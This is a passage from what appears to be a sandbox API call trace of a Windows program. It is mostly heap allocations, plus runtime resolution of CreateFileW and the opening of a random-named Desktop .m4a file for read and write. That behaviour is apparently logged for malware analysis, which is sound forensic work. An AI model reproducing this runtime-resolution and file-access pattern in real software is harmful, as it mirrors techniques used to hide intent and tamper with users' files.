RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0076.417] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0076.418] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0076.418] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0076.418] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc98 [0076.418] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0076.418] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.418] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b018 [0076.418] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.418] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e090 [0076.418] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.418] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0076.418] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.418] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e648 [0076.418] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.418] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e690 [0076.418] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.418] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0076.418] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.418] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0076.418] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.418] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0076.418] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.418] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af70 [0076.418] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.418] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0076.418] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.418] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0076.418] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.418] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0076.418] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.419] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.419] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfe8 [0076.419] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.419] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4f8 [0076.419] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.419] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b588 [0076.419] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc98 | out: hHeap=0x650000) returned 1 [0076.419] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0076.419] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.419] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.419] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0076.419] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.419] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0076.419] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.419] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0076.419] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.419] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.419] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0076.419] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.419] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b168 [0076.419] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.419] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b000 [0076.419] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.419] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.419] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abb0 [0076.419] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.419] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0076.419] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.419] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0076.419] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.419] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.420] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e330 [0076.420] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.420] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ada8 [0076.420] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.420] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x6969c0 [0076.420] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0076.420] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfd0 [0076.420] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0076.420] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.420] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0076.420] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e150 [0076.420] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0076.420] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0076.420] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb458 [0076.420] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb508 [0076.420] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0076.420] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0076.420] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0076.420] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0076.420] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0076.420] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc98 [0076.420] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb508 [0076.420] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0076.420] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb458 [0076.420] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb568 [0076.420] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0076.420] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0076.420] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0076.421] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0076.421] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb568 | out: hHeap=0x650000) returned 1 [0076.421] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb568 [0076.421] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0076.421] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb458 [0076.421] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0076.421] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0076.421] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0076.421] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0076.421] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0076.421] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0076.421] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0076.421] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0076.421] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb458 [0076.421] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb428 [0076.421] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0076.421] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0076.421] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0076.421] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0076.421] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0076.421] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb428 [0076.421] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0076.421] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb458 [0076.421] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0076.421] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0076.421] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0076.421] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0076.421] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0076.422] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0076.422] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0076.422] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0076.422] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb458 [0076.422] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0076.422] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0076.422] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0076.422] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0076.422] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0076.422] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0076.422] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0076.422] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0076.422] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb458 [0076.422] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3d8 [0076.422] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0076.422] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0076.422] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0076.422] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0076.422] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.422] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3d8 [0076.422] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0076.422] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb458 [0076.422] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5f8 [0076.422] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0076.422] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0076.422] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0076.422] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0076.422] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0076.422] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0076.423] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0076.423] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5f8 [0076.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.423] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e420 [0076.423] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x76e420, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0076.423] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0076.423] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0076.423] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0076.423] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0076.423] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da68 [0076.423] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5f8 [0076.423] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb458 [0076.423] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb398 [0076.423] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0076.423] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb518 [0076.423] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb638 [0076.423] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4c8 [0076.423] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20002) returned 0x771fe8 [0076.423] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0076.423] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0076.424] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb398 | out: hHeap=0x650000) returned 1 [0076.424] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0076.424] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0076.424] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb638 | out: hHeap=0x650000) returned 1 [0076.424] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0076.424] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da68 | out: hHeap=0x650000) returned 1 [0076.424] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7TIqi.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7tiqi.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0076.424] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4c8 [0076.424] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0076.424] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da68 [0076.424] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0076.424] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0076.424] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5b8 [0076.424] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb638 [0076.424] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5b8 | out: hHeap=0x650000) returned 1 [0076.424] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb638 | out: hHeap=0x650000) returned 1 [0076.424] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0076.424] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0076.424] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5b8 [0076.424] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0076.424] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb638 [0076.424] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0076.424] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x60) returned 0x75b820 [0076.424] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0076.424] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0076.425] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e438 [0076.425] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e168 [0076.425] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb518 [0076.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0076.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0076.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0076.425] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e438 [0076.425] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e168 [0076.425] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df40 [0076.425] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb518 [0076.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0076.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0076.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0076.425] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e168 [0076.425] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df40 [0076.425] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e558 [0076.425] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb518 [0076.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0076.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0076.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0076.425] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df40 [0076.425] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e558 [0076.425] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0076.425] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb518 [0076.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0076.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0076.425] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0076.425] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e558 [0076.426] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0076.426] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e570 [0076.426] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb518 [0076.426] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0076.426] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0076.426] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0076.426] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0076.426] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e570 [0076.426] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa30 [0076.426] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb518 [0076.426] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aa30 | out: hHeap=0x650000) returned 1 [0076.426] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0076.426] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e570 | out: hHeap=0x650000) returned 1 [0076.426] FreeLibrary (hLibModule=0x76d30000) returned 1 [0076.426] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0076.426] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb568 | out: hHeap=0x650000) returned 1 [0076.426] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0076.426] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0076.426] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0076.426] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0076.426] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.426] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc98 | out: hHeap=0x650000) returned 1 [0076.426] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0076.426] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0076.426] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0076.426] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0076.426] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0076.426] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e090 | out: hHeap=0x650000) returned 1 [0076.427] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e690 | out: hHeap=0x650000) returned 1 [0076.427] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e648 | out: hHeap=0x650000) returned 1 [0076.427] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0076.427] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0076.427] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: 